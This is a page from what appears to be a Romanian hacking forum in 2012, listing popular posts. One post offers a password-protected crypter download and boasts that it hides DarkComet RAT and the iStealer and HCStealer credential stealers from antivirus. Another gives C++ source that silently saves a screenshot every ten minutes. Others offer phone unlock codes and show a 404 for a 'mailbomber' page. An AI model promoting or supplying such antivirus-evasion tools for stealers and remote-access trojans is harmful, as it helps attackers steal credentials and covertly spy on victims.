Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 03/28/12 in all areas

  1. Am asteptat activarea HWID-ului 2 sapt (WTF), dupa care am incercat cel mai "ieftin" truc posibil... si a mers Descarcati cripterul de aici http://www.sendspace.com/file/vjmobx Parola in PM (cei care simtiti ca nu meritati parola nu va obositi sa dati PM) In arhiva am facut un fisier text (cum_sa.txt) care va explica ce trebuie facut pentru a folosi crypterul. Nu va spun aici pentru a evita noobii care-l au si nu il pot folosi NU am lipit nici un Keylogger/Stealer/Server asa ca feel free to scan it Am incercat sa criptez un server de DarkComet...fara succes Daca reusiti sa criptati server DarkComet VA ROG FRUMOS luminati-ma si pe mine, postati aici sau in PM ..PLEASE Doar de proba am criptat un server , fara sa mearga... (fara EOF) http://vscan.novirusthanks.org/analysis/76c7b15b30369e07e40b40f47977469d/bXVpZWx1bWF0YS1leGU=/ Screenshot : http://imageshack.us/photo/my-images/155/crypterb.png/ UPDATE : DarkComet : merge (MultiDropper > Crypter) detectat de 1 din 9 antivirusi (AVG mai exact) IStealer 6.3 : merge ; detectat de 1 din 9 antivirusi (AVG mai exact) HCStealer : merge ; detectat de 1 din 9 antivirusi (AVG mai exact) Trece de KasperskyPure fara probleme +rep daca va este util
    1 point
  2. Asa cum am spus si in titlu, oferim(Eu si Nae_rasnov) mocca 30 de coduri de deblocare ptr urmatoarele branduri de telefoane: - 10 coduri LG - 10 coduri Blackberry - 10 coduri Alcatel Pentru Blackberry avem nevoie de imei + mep. Amandoua se pot afla din meniul telefonului sau sunt cateva softuri pe net care citeste acel mep code ( use "gooagal" nu fi-ti lenesi) ----------------------------------------------------------------------------------------------------------- Pentru LG este nevoie doar de imei. ----------------------------------------------------------------------------------------------------------- Iar pentru Alcatel este nevoie de imei + Provider id ------------------------------------------------------------> Pot cere coduri useri care au minim 10 posturi, restul vor fi ignorati.
    1 point
  3. Vezi daca poti compila... #pragma comment(lib, "GdiPlus.lib") #include <windows.h> #include <iostream> #include <gdiplus.h> #include <time.h> using namespace std; using namespace Gdiplus; struct timer { long tStart, tTime, tStamp; bool tAlive; }; int GetEncoderClsid(WCHAR *format, CLSID *pClsid) { unsigned int num = 0, size = 0; GetImageEncodersSize(&num, &size); if(size == 0) return -1; ImageCodecInfo *pImageCodecInfo = (ImageCodecInfo *)(malloc(size)); if(pImageCodecInfo == NULL) return -1; GetImageEncoders(num, size, pImageCodecInfo); for(unsigned int j = 0; j < num; ++j){ if(wcscmp(pImageCodecInfo[j].MimeType, format) == 0){ *pClsid = pImageCodecInfo[j].Clsid; free(pImageCodecInfo); return j; } } free(pImageCodecInfo); return -1; } int GetScreeny(LPWSTR lpszFilename, ULONG uQuality) // by Napalm { ULONG_PTR gdiplusToken; GdiplusStartupInput gdiplusStartupInput; GdiplusStartup(&gdiplusToken, &gdiplusStartupInput, NULL); HDC hdcScreen = CreateDC("DISPLAY", NULL, NULL, NULL); HDC hdcCapture = CreateCompatibleDC(hdcScreen); int nWidth = GetDeviceCaps(hdcScreen, HORZRES), nHeight = GetDeviceCaps(hdcScreen, VERTRES), nBPP = GetDeviceCaps(hdcScreen, BITSPIXEL); LPBYTE lpCapture; BITMAPINFO bmiCapture = { { sizeof(BITMAPINFOHEADER), nWidth, -nHeight, 1, nBPP, BI_RGB, 0, 0, 0, 0, 0, } }; HBITMAP hbmCapture = CreateDIBSection(hdcScreen, &bmiCapture, DIB_PAL_COLORS, (LPVOID *)&lpCapture, NULL, 0); if(!hbmCapture){ DeleteDC(hdcCapture); DeleteDC(hdcScreen); GdiplusShutdown(gdiplusToken); return 1; } int nCapture = SaveDC(hdcCapture); SelectObject(hdcCapture, hbmCapture); BitBlt(hdcCapture, 0, 0, nWidth, nHeight, hdcScreen, 0, 0, SRCCOPY); RestoreDC(hdcCapture, nCapture); DeleteDC(hdcCapture); DeleteDC(hdcScreen); CLSID imageCLSID; Bitmap *pScreenShot = new Bitmap(hbmCapture, (HPALETTE)NULL); EncoderParameters encoderParams; encoderParams.Count = 1; encoderParams.Parameter[0].NumberOfValues = 1; encoderParams.Parameter[0].Guid = EncoderQuality; encoderParams.Parameter[0].Type = EncoderParameterValueTypeLong; encoderParams.Parameter[0].Value = &uQuality; GetEncoderClsid(L"image/jpeg", &imageCLSID); int result = (pScreenShot->Save(lpszFilename, &imageCLSID, &encoderParams) == Ok); delete pScreenShot; DeleteObject(hbmCapture); GdiplusShutdown(gdiplusToken); return result; } bool pathExists(char *g_Path) { return GetFileAttributes(g_Path) != INVALID_FILE_ATTRIBUTES; } int APIENTRY WinMain(HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmdLine, int nShowCmd) { char pathTF[128], pathTB[48], pathTBC[64]; wchar_t chToWCh[128]; int nextImg = 0; timer CLK; ZeroMemory(&pathTBC, sizeof(pathTBC)); ZeroMemory(&pathTB, sizeof(pathTB)); ZeroMemory(&pathTF, sizeof(pathTF)); GetCurrentDirectory(sizeof(pathTB), pathTB); sprintf_s(pathTBC, sizeof(pathTBC), "%s/scr", pathTB); if(!pathExists((char*)pathTBC)) CreateDirectory((char*)pathTBC, NULL); CLK.tStart = clock(); CLK.tStamp = 0; CLK.tAlive = true; while(CLK.tAlive) { CLK.tTime = clock() - CLK.tStart; if(CLK.tTime > CLK.tStamp) { sprintf_s(pathTF, sizeof(pathTF), "%s/screeny%d.jpg", pathTBC, nextImg); while(pathExists((char*)pathTF)) { nextImg++; sprintf_s(pathTF, sizeof(pathTF), "%s/screeny%d.jpg", pathTBC, nextImg); } size_t newSize = strlen(pathTF) + 1; size_t noConvChars = 0; mbstowcs_s(&noConvChars, chToWCh, newSize, pathTF, _TRUNCATE); GetScreeny((LPWSTR)chToWCh, 75); CLK.tStamp += 10*60*1000; } Sleep(100); } return 0; }
    1 point
  4. Not Found The requested URL /mailbomber/ was not found on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
    -1 points
×
×
  • Create New...